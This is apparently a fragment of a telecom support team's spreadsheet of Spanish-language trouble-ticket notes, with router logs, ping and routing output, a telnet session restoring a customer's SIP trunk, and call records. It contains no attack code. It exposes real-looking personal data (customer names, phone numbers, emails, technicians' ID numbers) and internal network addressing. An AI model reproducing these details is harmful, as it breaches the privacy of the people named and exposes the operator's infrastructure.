MAY 13 02:54:10.591 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 02:59:19.614 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 03:04:28.252 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 03:09:36.995 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 03:14:45.890 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 03:19:54.549 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 03:25:03.508 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 03:30:12.075 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 03:35:20.570 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 03:40:29.372 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 03:45:37.819 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 03:50:46.582 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 03:55:55.049 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 04:01:03.576 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 04:06:12.299 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 04:11:20.826 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 04:16:29.428 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 04:21:38.163 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 04:26:46.790 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 04:31:55.345 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 04:37:04.068 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 04:42:12.915 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 04:47:21.598 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 04:52:30.360 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 04:57:38.863 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 05:02:47.670 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 05:07:56.229 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 05:13:04.796 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 05:18:13.559 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 05:23:22.266 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 05:28:30.944 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 05:33:39.703 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 05:38:48.462 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 05:43:57.325 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 05:49:05.916 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 05:50:55.981 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 13 05:50:56.981 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 13 05:50:56.981 GMT: %OSPF-5-ADJCHG: PROCESS 1, NBR 22.96.223.67 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
MAY 13 05:51:15.981 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
MAY 13 05:51:16.981 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
MAY 13 05:51:16.981 GMT: %OSPF-5-ADJCHG: PROCESS 160, NBR 10.154.71.81 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
MAY 13 05:51:44.981 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 13 05:51:45.981 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 13 05:51:51.981 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
MAY 13 05:51:52.981 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
MAY 13 05:51:52.981 GMT: %OSPF-5-ADJCHG: PROCESS 160, NBR 0.0.0.0 ON GIGABITETHERNET0/0 FROM ATTEMPT TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
MAY 13 05:51:56.981 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 13 05:51:57.981 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 13 05:52:51.982 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
MAY 13 05:52:52.982 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
MAY 13 05:52:52.982 GMT: %OSPF-5-ADJCHG: PROCESS 160, NBR 0.0.0.0 ON GIGABITETHERNET0/0 FROM ATTEMPT TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
MAY 13 05:52:57.982 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 13 05:52:58.982 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 13 05:54:14.595 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 05:55:08.111 GMT: %OSPF-5-ADJCHG: PROCESS 160, NBR 0.0.0.0 ON GIGABITETHERNET0/0 FROM ATTEMPT TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 13 05:55:18.123 GMT: %OSPF-5-ADJCHG: PROCESS 160, NBR 10.154.71.81 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
MAY 13 05:55:56.984 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 13 05:55:57.984 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 13 05:56:41.784 GMT: %OSPF-5-ADJCHG: PROCESS 1, NBR 22.96.223.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
MAY 13 05:59:23.242 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 06:04:32.008 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 06:05:52.725 GMT: %AAA-3-BADSERVERTYPEERROR: CANNOT PROCESS AUTHENTICATION SERVER TYPE TACACS+ (UNKNOWN)
IP2071041#
SHOW CLOCK
06:06:22.265 GMT FRI MAY 13 2022
IP2071041#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.154.71.81           13   084F.0AC8.69CC  ARPA   GIGABITETHERNET0/0
INTERNET  10.154.71.82            -   CCEF.4831.6940  ARPA   GIGABITETHERNET0/0
INTERNET  22.96.0.105            10   70C9.C6F2.D4A8  ARPA   GIGABITETHERNET0/1
INTERNET  22.96.0.106             -   CCEF.4831.6941  ARPA   GIGABITETHERNET0/1
IP2071041#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/IP2071041SV/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
AT0/1/0                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
IP2071041#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.154.71.82    YES NVRAM  UP                    UP
GIGABITETHERNET0/1         22.96.0.106     YES NVRAM  UP                    UP
ATM0/1/0                   UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.166.0.232    YES NVRAM  UP                    UP
IP2071041#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN WALMART 10.154.71.82
  PING 10.154.71.82: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.154.71.82 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.30.86
DISPLAY IP ROUTING-TABLE VPN-INSTANCE WALMART 10.154.71.82
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.154.71.82/32  DIRECT  0    0                 0.0.0.0         VLANIF1760			</t>
  </si>
  <si>
    <t>F4562101</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO LIMA 54343746 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001151913</t>
  </si>
  <si>
    <t>F4562107</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VANESSA  44736011  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001146257</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LESBIA 48333999 RESPONDE VANESA MENCIONA QUE APLICAON REINICIO A LOS EQUIPOS PORQUE EL SERVICIO ES INESTABLE
CLIENTE INDICA QUE AHORITA TODO ESTA FUNCIONANDO CORRECTAMENTE POR LO QUE SOLICITA LLAMADA A LAS 10:00
-ID  2001146469</t>
  </si>
  <si>
    <t>F4562151</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE POR SI ES NECESARIO INGRESO AL PR
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: VIERNES, 13 DE MAYO DE 2022 9:57
PARA: JPOSADAS@MULTIEQUIPOSSA.COM &lt;JPOSADAS@MULTIEQUIPOSSA.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | "859500001T" |EQUIPOS MULTIPLES DE GUATEMALA, S.A. | INTERNET_KM 100.5 AUTOPISTA PUERTO QUETZAL FINCA PORTUARIA ZONA 6 OUERTO SAN JOSE ESCUINTLA 13.94575
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO "859500001T" |EQUIPOS MULTIPLES DE GUATEMALA, S.A. | INTERNET_KM 100.5 AUTOPISTA PUERTO QUETZAL FINCA PORTUARIA ZONA 6 OUERTO SAN JOSE ESCUINTLA 13.94575
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO PARA EL DIA DE HOY.
TECNICOS:
AXEL DANILO ZARPEC SAZO	796395	1624-52527-0501
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE POSADOS 32694665 MENCIONA QUE EL ESTADO DE LAS LUCES ES EN ROJO
-ID 2001162281
NOMBRE DEL CLIENTE: EQUIPOS MULTIPLES DE GUATEMALA, S.A.
UBICACIÓN:KM 100.5 AUTOPISTA PUERTO QUETZAL FINCA PORTUARIA ZONA 6 PUERTO SAN JOSE ESCUINTLA
CONTACTO EN SITIO: ERHY TELON - 30044686
HORARIO DE ATENCION: 8:00 - 17:00
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO -- JPOSADAS@MULTIEQUIPOSSA.COM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE POSADOS 32694665 MENCIONA QUE AYER LLOVIO MUY FUERTE (CON AIRE) ESO PROVOCO QUE UN CABLE SE REVENTARA
CLIENTE INDICA QUE ESE CABLE LLEGA HASTA LAS INSTACIONES (PR)
CLIENTE SOLICITA LLAMADA EN 20 MIN PARA CONFIRMAR EL ESTADO DE LAS LUCES QUE TIENEN LOS EQUIPOS
-ID 2001154257</t>
  </si>
  <si>
    <t>F4562157</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ADOLFO CASTILLO 77471329 CLIENTE SIGUE REPORTANDO INCONVENIENTE POR LO QUE BRINDA CONTACTO DE PR  MIGUEL RIVAS 69657739
-ID 2001158059</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE MIGUEL RIVAS 69657739 MENCIONA QUE NO ESTA EN PR POR LO QUE SOLICITA LLAMADA EN 15 MIN
-ID 2001284533 - 2001285182</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ADOLFO CASTILLO 77471329 QUIEN SOLICITA SE LLAME A MIGUEL RIVAS 69657739
-ID 2001283593 - 2001283964</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL RIVAS 69657739 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001301098</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL RIVAS 69657739 MENCIONA QUE EL SERVICIO YA RESTABLECIO
-ID 2001159224</t>
  </si>
  <si>
    <t>F4562165</t>
  </si>
  <si>
    <t>CLIENTE APLICA REINICIO A ETQUIPO AETHRA, A MANERA DE PREVENCION CAMBIA DE TOMA EN EL UPS Y SERVICIO RESTABLECE- CLIENTE REALIZA PRUEBAS Y VALIDA ##
&lt;GNCYGTAKN2D1C08A03EIM6&gt;PING -C 1500 -S 1500 -M 30 -B -VPN-INSTANCE IP_PBX_ACCESO  10.103.9.43
  PING 10.103.9.43: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    ...................................................................................................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.103.9.43 PING STATISTICS ---
    169 PACKET(S) TRANSMITTED
    70 PACKET(S) RECEIVED
    58.57% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 10/11/17 MS
&lt;GNCYGTAKN2D1C08A03EIM6&gt;TELNET VPN-INSTANCE IP_PBX_ACCESO  10.103.9.43
TRYING 10.103.9.43 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.103.9.43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10W
MAC ADDRESS: 00:D0:D6:53:29:D8
WIRELESS CARD: ATHEROS COMMUNICATIONS, INC. - AR9287 WIRELESS NETWORK ADAPTER PCIE
USER NAME :S
PASSWORD :
&lt;S&gt; LOGGED AT USER LEVEL
DTSOLUTIONS_90001910827&gt;VOIP SHOW STATUS -S
RESOURCE                AVAILABLE  MAXIMUM
TRUNK SIP CONNECTIONS :        76       76
DSP0                  :         8        8
DSP1 (ISDN-PRI)       :        30       30
CURRENT TRUNK SIP CONNECTIONS = 0 (MAX TRUNK SIP CONNECTIONS = 76)
STATUS OF SIP
TRUNK-NAME            CONFIG.  USERNAME                         REGISTRATION-STATUS                     REGISTRATION-HOST     REFRESH   REG.TIME
SIP-DT                DISABLE  +50222107800                     UNREGISTERED
STATUS OF ISDN-PRI-LINE-1
CONFIGURATION STATUS : ENABLE, USED INTO INBOUNDLIST,OUTBOUNDLIST
NO B CHANNELS IN USE.
STATUS OF SIP-DT
CONFIGURATION STATUS     : DISABLE
COMMAND EXECUTED
DTSOLUTIONS_90001910827\VOIP&gt;SHOW STATUS -S
RESOURCE                AVAILABLE  MAXIMUM
TRUNK SIP CONNECTIONS :        76       76
DSP0                  :         8        8
DSP1 (ISDN-PRI)       :        30       30
CURRENT TRUNK SIP CONNECTIONS = 0 (MAX TRUNK SIP CONNECTIONS = 76)
STATUS OF SIP
TRUNK-NAME            CONFIG.  USERNAME                         REGISTRATION-STATUS                     REGISTRATION-HOST     REFRESH   REG.TIME
SIP-DT                DISABLE  +50222107800                     UNREGISTERED
STATUS OF ISDN-PRI-LINE-1
CONFIGURATION STATUS : ENABLE, USED INTO INBOUNDLIST,OUTBOUNDLIST
NO B CHANNELS IN USE.
STATUS OF SIP-DT
CONFIGURATION STATUS     : DISABLE
COMMAND EXECUTED
DTSOLUTIONS_90001910827\VOIP&gt;UP
COMMAND EXECUTED
DTSOLUTIONS_90001910827VOIP
DTSOLUTIONS_90001910827\VOIP&gt;SHOW STATUS -S
RESOURCE                AVAILABLE  MAXIMUM
TRUNK SIP CONNECTIONS :        76       76
DSP0                  :         8        8
DSP1 (ISDN-PRI)       :        30       30
CURRENT TRUNK SIP CONNECTIONS = 0 (MAX TRUNK SIP CONNECTIONS = 76)
STATUS OF SIP
TRUNK-NAME            CONFIG.  USERNAME                         REGISTRATION-STATUS                     REGISTRATION-HOST     REFRESH   REG.TIME
SIP-DT                DISABLE  +50222107800                     UNREGISTERED
STATUS OF ISDN-PRI-LINE-1
CONFIGURATION STATUS : ENABLE, USED INTO INBOUNDLIST,OUTBOUNDLIST
NO B CHANNELS IN USE.
STATUS OF SIP-DT
CONFIGURATION STATUS     : DISABLE
COMMAND EXECUTED
DTSOLUTIONS_90001910827\VOIP&gt;
DTSOLUTIONS_90001910827\VOIP&gt;
DTSOLUTIONS_90001910827\VOIP&gt;
DTSOLUTIONS_90001910827\VOIP&gt;QUIT
COMMAND EXECUTED
INIT COMMAND LINE INTERFACE...
ATOS VERSION: 6.1.13 (24@BVMECCJQVDVPUW)
ATOS DATE: 29/10/2015  9:58
ATOS LICENSE: 30CH-P1+ADVPLUS
HARDWARE: SV6044EMP1W - 24760
PRODUCT CODE: 708190337
SERIAL NUMBER: 00010W
MAC ADDRESS: 00:D0:D6:53:29:D8
WIRELESS CARD: ATHEROS COMMUNICATIONS, INC. - AR9287 WIRELESS NETWORK ADAPTER PCIE
USER NAME :TELGUA
PASSWORD :********
&lt;TELGUA&gt; LOGGED AT ADMINISTRATOR LEVEL
DTSOLUTIONS_90001910827&gt;&gt;VOIP
DTSOLUTIONS_90001910827\VOIP&gt;&gt;TRUK
NODE/COMMAND: "TRUK" NOT FOUND
DTSOLUTIONS_90001910827\VOIP&gt;&gt;TRUNKN
NODE/COMMAND: "TRUNKN" NOT FOUND
DTSOLUTIONS_90001910827\VOIP&gt;&gt;TRUK
NODE/COMMAND: "TRUK" NOT FOUND
DTSOLUTIONS_90001910827\VOIP&gt;&gt;TRUNK
DTSOLUTIONS_90001910827\VOIP\TRUNK&gt;&gt;SIP-DT
DTSOLUTIONS_90001910827\VOIP\TRUNK\SIP-DT&gt;&gt;SET OFF
COMMAND EXECUTED
DTSOLUTIONS_90001910827\VOIP\TRUNK\SIP-DT&gt;&gt;SET OFF
COMMAND EXECUTED
DTSOLUTIONS_90001910827\VOIP\TRUNK\SIP-DT&gt;&gt;SET ON
COMMAND EXECUTED
DTSOLUTIONS_90001910827\VOIP\TRUNK\SIP-DT&gt;&gt;SET ON
COMMAND EXECUTED
DTSOLUTIONS_90001910827\VOIP\TRUNK\SIP-DT&gt;&gt;UP
COMMAND EXECUTED
DTSOLUTIONS_90001910827\VOIP\TRUNK&gt;&gt;UP
COMMAND EXECUTED
DTSOLUTIONS_90001910827\VOIP&gt;&gt;SHOW STATUS -S
RESOURCE                AVAILABLE  MAXIMUM
TRUNK SIP CONNECTIONS :        76       76
DSP0                  :         8        8
DSP1 (ISDN-PRI)       :        30       30
CURRENT TRUNK SIP CONNECTIONS = 0 (MAX TRUNK SIP CONNECTIONS = 76)
STATUS OF SIP
TRUNK-NAME            CONFIG.  USERNAME                         REGISTRATION-STATUS                     REGISTRATION-HOST     REFRESH   REG.TIME
SIP-DT                ENABLE   +50222107800                     REGISTERED                              10.16.246.231:5060    2516      13 MAY 2022 08:29:21
STATUS OF ISDN-PRI-LINE-1
CONFIGURATION STATUS : ENABLE, USED INTO INBOUNDLIST,OUTBOUNDLIST
NO B CHANNELS IN USE.
STATUS OF SIP-DT
CONFIGURATION STATUS     : ENABLE
CURRENT REGISTRAR HOST   : 10.16.246.231
CURRENT PROXY HOST       : 10.16.246.231
  SECONDARY PROXY HOSTS  : NONE
INTERFACE STATUS         : ETH1 UP
REGISTRATION STATUS      : REGISTERED (REFRESH TIME = 2516 SEC)
LOGICAL STATUS           : USED INTO INBOUNDLIST,OUTBOUNDLIST
MESSAGE WAITING          : NO
NO CONNECTIONS
COMMAND EXECUTED
DTSOLUTIONS_90001910827\VOIP&gt;&gt;UP
COMMAND EXECUTED
DTSOLUTIONS_90001910827&gt;&gt;UP
COMMAND EXECUTED
DTSOLUTIONS_90001910827&gt;&gt;ISDN
DTSOLUTIONS_90001910827\ISDN&gt;&gt;ISDN-PRI
NODE/COMMAND: "ISDN-PRI" NOT FOUND
DTSOLUTIONS_90001910827\ISDN&gt;&gt;ISDN-PRI1
DTSOLUTIONS_90001910827\ISDN\ISDN-PRI1&gt;&gt;SHOW STATUS -S
STATUS OF ISDN-PRI1 INTERFACE
LAYER 1 STATUS = UP
LAYER 1 UP COUNT = 2
LAYER 1 UP TIME = 0H 02M 30S
LAYER 2 STATUS = UP
USED B CHANNELS: NONE
-------------RX----------TX----------
LOS ALARM  : OFF
AIS ALARM  : OFF         OFF
LOF ALARM  : OFF
RAI ALARM  : OFF         OFF
BER ALARM  : OFF
BER (1SEC) : 0.00E+00
LOOP       : OFF         OFF
##VIVO</t>
  </si>
  <si>
    <t>SE LLAMAA A CLIENTE MIGUEL MONTES-37604340  SE TIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>F4562172</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MORAZAN 95715971 CLIENTE SOLICITA QUE SE LE ENVIE DATOS DEL PERSONAL TECNICO AL CORREO CARLOS.MORAZAN@CAYPSOL.COOP.HL
2001157633
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN EL SITIO// QUEDAMOS ATENTOS A LA RESPUESTA POR PARTE DE CLIENTE
BUEN DÍA ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO,  SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN EL SITIO.
DIRECCIÓN:  BO EL CENTRO EDIF. MAQUELO NUM. 444-592, TOCOA COLÓN
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS.
DARWIN CRUZ              0209-1987-00763
OLVIN DOMINGUEZ      0208-1993-00382
QUEDAMOS ATENTOS A SUS DUDAS Y COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4562179</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE Y RESPONDE BRYAN, MENCIONA QUE YA SE VALIDO CON CLIENTE FINAL Y SERVICIO SE ENCUENTRA ESTABLE Y OPERTATIVO POR LO QUE AUTORIZA CIERRE DE CASO.
2001242201
COLA:
NOMBRE: A: 22790909
NÚMERO: 22790909
DURACIÓN: 0:01:46
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 22790909
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/05/2022 13:17:07</t>
  </si>
  <si>
    <t>F4562181</t>
  </si>
  <si>
    <t>SE CONTACTA CON LEOPOLDO LUIS AL 50293020 ID 2001217302 PARA VALIDAR COMO SE ENCUENTRA EL SERVICIO, COMENTA QUE  POR LO QUE SE TRANSFIERE CON EL GESTOR JURGEN.BOCH AL 8126 ID 2001218588 ATIENDE YENSI.CALGUA Y TRANSFIERE LA LLAMADA, PERO EN LA TRANSFERENCIA INDICA QUE NO ESTA DISPONIBLE. BRINDA LA OPCION DE LLAMAR NUEVAMENTE A LA EXT. SE GENERA Y CORTA LA LLAMDA. SE LLAMA NUEVAMETE AL 8126 ID 2001219539 Y SE TRANSFIERE CON EL GESTOS DARWIN SE DEJA CON EL PR EN LINEA</t>
  </si>
  <si>
    <t>F4562188</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LIDIA TABORA 31996022 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001209562</t>
  </si>
  <si>
    <t>F4562207</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JULIO PEREZ 36571015 NO CONTESTO IVR ENVIA A BUZON, ID:2001157696.
ESTIMADOS CC VALIDAR MEDIANTE SD, SE VALIDAR CONEXION DE CENTRAL A PUNTO REMOTO.</t>
  </si>
  <si>
    <t>F4562211</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENT JAIME GAYARNO 58410180 PARA REALIZAR PRUEBAS
